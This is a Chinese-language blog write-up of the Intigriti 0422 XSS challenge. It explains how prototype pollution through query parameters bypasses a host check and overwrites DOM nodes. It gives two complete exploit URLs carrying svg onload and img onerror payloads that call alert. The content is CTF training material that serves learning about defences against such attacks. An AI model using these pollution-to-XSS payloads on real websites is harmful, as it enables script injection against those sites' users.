网络安全-intigriti-0422-XSS-Challenge Write-up

已于 2024-09-13 15:25:03 修改
阅读量761 收藏 9
点赞数 4
分类专栏: 网络安全 文章标签: xss 前端
于 2024-09-13 15:15:19 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_68976043/article/details/142209590
版权

目录

一、环境

二、解题

2.1看源码

一、环境

Intigriti April Challenge

二、解题

要求:弹出域名就算成功

2.1看源码

我们看到marge方法,肯定是原型链污染题目

接的是传参,我们可控的点在于qs.config和qs.settings,这两个可控又可以覆盖原来的配置项

那我们得看checkHost怎么进来,匹配一下可以看到temp分割取端口号,hostname取域名

它们的两个值是数组,假如说appConfig["window-toolbar"][__proto__][1] = 8080,这样是不是可以把8080取出来,那我们的问题就到突破checkHost

JavaScript中,数组的下标可以⽤字符或是字符串数字来取值,所以在原型链中,我们可 以给[]对象添加⼀个名称为1的属性,这样 temp 在通过下标 1 取值的时候,实际上取到的 是数组中属性为 1 的值

[].constructor.prototype['1'] = 8080
//[1: 8080, constructor: ƒ, concat: ƒ, copyWithin: ƒ, fill: ƒ, find: ƒ, …]

那我们可以 利用这个数组突破checkHost,现在temp[1]的祖先1就等于8080

?config[window-toolbar][constructor][prototype][1]=8080

现在还有一个问题覆盖root为<svg>这个标签

https://challenge-0422.intigriti.io/challenge/Window%20Maker.html?config[window-toolbar][c
onstructor][prototype][1]=8080&settings[root][ownerDocument][body][children][1][outerHTML]
[1]=%3Csvg%20onload%3Dalert(1)%3E

 我们可以看到已经被污染

最开始要取body但是只能取到main所以通过main一层层继承取到了,我们也看的很清最后取的svg再body下

那怎么污染的,我们通过结果看过程,最后因为svg是我们插进去的,在没有插进去之前div应该是第一个,相当于就是将root覆盖为了root,但是我们的命令在进去之前已经被js处理为数组了,所以最后[outerHTML]后面还有一个1去取payload

第二种解法原理一样:替换body

https://challenge-0422.intigriti.io/challenge/Window%20Maker.html?config[window-toolbar][c
onstructor][constructor][prototype][xd][s]=1&config[window-toolbar][constructor][constructor][constructor][prototype][xd][constructor][prototype][innerHTML][0]=%3Cimg%20src%3da%20onerror%3dalert(document.domain);alert%3dundefined%3E

凌晨五点的星
关注
专栏目录
java -xss_Java线程与Xss
weixin_31302909的博客
02-12 3836
jvm系列Xss与线程个数Xss越大,每个线程的大小就越大,占用的内存越多,能容纳的线程就越少;Xss越小,则递归的深度越小,容易出现栈溢出 java.lang.StackOverflowError。减少局部变量的声明,可以节省栈帧大小,增加调用深度。/*** -Xss128K deep of calling = 675* -Xss256K deep of calling = 1686*...
网络安全 - Web 安全攻防 - DOM 型 XSS 实验包 - DOMBasedXSSLab.zip
09-22
**DOMBasedXSSLab.zip** 是一个专注于 Web 安全攻防技术,特别是 DOM 型 XSS(跨站脚本攻击)的实验包。DOM 型 XSS 是一种发生在客户端的脚本安全漏洞,攻击者通过操纵 Web 页面的 DOM 来插入恶意脚本,从而在用户的...
网络安全-自学笔记
热门推荐
关注网络安全、云原生安全
12-01 17万+
目录 WEB(应用)安全 前端安全 xss攻击 后端安全 文件上传漏洞 WebShell 解析安全 数据安全 sql注入 通信安全 WEB(应用)安全 前端安全 xss攻击 后端安全 文件上传漏洞 WebShell 解析安全 数据安全 sql注入 网络安全-sqlmap学习笔记 通信安全 网络-http协议学习笔记(消息结构、请求方法、状态码等) ...
在kali环境下安装Beef-Xss靶场搭建
weixin_51525416的博客
09-02 1981
在kali环境下安装Beef-Xss靶场搭建
XSS-Protection未配置漏洞
煜铭2011
06-20 4621
0x00 背景 HTTP XSS-Protection响应标头是Internet Explorer,Chrome和Safari的功能,当页面检测到反射的跨站点脚本(XSS)攻击时,该页面将阻止加载页面。 尽管当站点实施强大的Content-Security-Policy禁止使用内JavaScript(“不安全内联”)时。 在现代浏览器中这些保护在很大程度上是不必要的,但它们仍可以为尚未使用旧版Web浏览器的用户提供保护 支持CSP。 0x01 修复思路 配置XSS-Protection响应标头值
Web 安全之 X-XSS-Protection 详解
路多辛的所思所想
11-27 1977
跨站脚本(XSS)是一种常见的网络攻击,攻击者通过在网站中插入恶意脚本,当用户访问被污染的页面时,恶意脚本会被执行,从而窃取用户的敏感信息、篡改页面内容或者执行其他恶意操作。XSS 攻击分为三种类型:持久型、DOM-based 型和反射型 XSS(非持久型)。持久型 XSS:攻击者在网页中插入恶意脚本,并将其保存到服务器或数据库中。当其他用户访问该页面时,恶意脚本会被执行,从而进行长期的网络攻击。这种类型的攻击比较危险,因为可以长期地影响用户。
SpringBoot配置XSS过滤器基于mica-xss
靖节先生的博客
04-04 4310
SpringBoot配置XSS过滤器基于mica-xss1. 业务概述1.1 XSS简介1.2 需求概述2. mica概述2.1 mica简介2.1 mica对应springboot版本信息2.2 mica核心功能2.3 mica协议文档3. SpringBoot集成mica-xss3.1 maven依赖3.2 代码实现3.3 测试验证 1. 业务概述 1.1 XSS简介 XSS攻击即跨站点脚本攻击(Cross Site Script),为不和层叠样式表(Cascading Style Sheets, CS
xss-lab通关之路
黑白的博客
10-12 5353
xss-lab通关之路
X-XSS-Protection
椰汁菠萝
03-18 1万+
HTTPX-XSS-Protection响应头是Internet Explorer,Chrome和Safari的一个功能,当检测到跨站脚本攻击 (XSS)时,浏览器将停止加载页面。虽然这些保护在现代浏览器中基本上是不必要的,当网站实施一个强大的Content-Security-Policy来禁用内联的JavaScript ('unsafe-inline')时,他们仍然可以为尚不支持CSP...
网络安全 --- xss-labs靶场通关(1-10关)】详细的xss-labs靶场通关思路及技巧讲解,让你对xss漏洞的理解更深刻
m0_67844671的博客
10-21 5682
网络安全 --- xss-labs靶场通关(1-10关)】详细的xss-labs靶场通关思路及技巧讲解,让你对xss漏洞的理解更深刻
网络安全 - Web 安全攻防 - 反射型 XSS 实验包 - ReflectiveXSSLab.zip
09-22
**ReflectiveXSSLab.zip** 是一个专注于网络安全领域中 Web 安全攻防实战的实验包,特别针对反射型 XSS(跨站脚本攻击)进行设计。反射型 XSS 是一种常见的 Web 安全漏洞,攻击者通过在 URL 参数中注入恶意脚本,当...
CTF-Write-up:CTF撰写和信息
03-21
CTF(Capture The Flag)是网络安全领域的一种竞赛形式,它模拟了现实世界中的安全挑战,参赛者通过解谜、逆向工程、网络攻防等手段获取“旗子”(通常是代表解题成功的字符串),以此来得分。CTF比赛涵盖了密码学、...
xss-labs-master.rar
05-09
"xss-labs-master.rar" 提供了一个针对XSS漏洞的专项练习平台,旨在帮助初学者及安全爱好者提升对XSS攻击的理解和防御能力。这个靶机资源共分为二十个关卡,由浅入深,逐步引导用户掌握XSS攻防的核心技巧。 一、XSS...
xss-labs-master.zip(xss注入通关游戏/靶场)
03-21
`xss-labs-master.zip`包含了一个专门用于学习和实践XSS注入的通关游戏或靶场,对于网络安全测试人员来说,这是一个极好的学习资源。 **XSS分类** 1. **存储型XSS**:也称为持久型XSS,攻击者将恶意脚本存入服务器...
利用配置错误的负载均衡器,通过XSS窃取Cookies
zkaq7777777的博客
10-14 616
通过将负载均衡器的主机头注入漏洞与XSS攻击结合,攻击者绕过了Cookies的保护机制,获得了未授权的敏感信息。在测试过程中,发现了负载均衡器的一个漏洞,该漏洞允许注入主机头(Host-Header)。通过注入自定义的 X-Forwarded-Host 头,攻击者能够混淆负载均衡器的 Cookie 检查,使其将 Cookies 转发到攻击者自己的服务器,而不是授权服务器(authz server)。这种注入会导致负载均衡器将 Cookies 转发到攻击者的协作服务器,而不是合法的授权服务器。
[渗透测试] XSS跨站点脚本攻击 零基础入门教程
最新发布
Da1NtY的博客
10-15 676
跨站点脚本(Cross Site Scripting,XSS)是指客户端代码注入攻击。攻击者在合法的网站或Web应用程序中执行恶意脚本。当Web应用程序在其生成的输出中使用未经验证或未编码的用户输入时,就会发生XSSXSS主要使用JS来执行恶意攻击,因为JS可以操控HTML、CSS、浏览器等,所有就给了攻击者可乘之机。
web扩展
x737510的博客
10-10 583
HTTP(Hypertext Transfer Protocol)协议中的它们在用途和使用方式上有一些区别。用于请求服务器上的资源,通常是获取数据。GET 请求是幂等的,多次请求返回的结果应该是相同的,而且不应该对服务器产生任何副作用。用于向服务器提交数据,通常是提交表单数据或上传文件等。POST 请求可能对服务器产生副作用,例如在数据库中创建新的资源。数据通过 URL 参数传递,附在 URL 后面。因为数据在 URL 中可见,所以不适合传递敏感信息,且有长度限制。
前端开发攻略---8种方法实现在浏览器中跨页面通信
nibabaoo的博客
10-15 750
浏览器实现跨标签页通信的多种方式
Vue3动态组件component不生效问题解决方法
Java_fenxiang的博客
10-14 476
问题:vue3循环渲染动态组件component不生效,页面空白在vue3使用component动态组件展示组件时,组件就是不展示显示空白。在vue2中使用动态变量component展示组件都是没问题。试了很多方法 踩了很多坑,所以记录下:登录后复制 <div class="preview-list" id="c...
DOM-XSS漏洞挖掘与攻击面全面解析
随着移动应用和Webview的普及,跨域跳转的安全问题愈发突出,导致DOM-XSS漏洞增多。 3. postMessage API: 这个跨域通信机制在支付、登录等场景中被广泛使用。若页面未对消息来源进行验证,恶意页面可以嵌套并利用...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值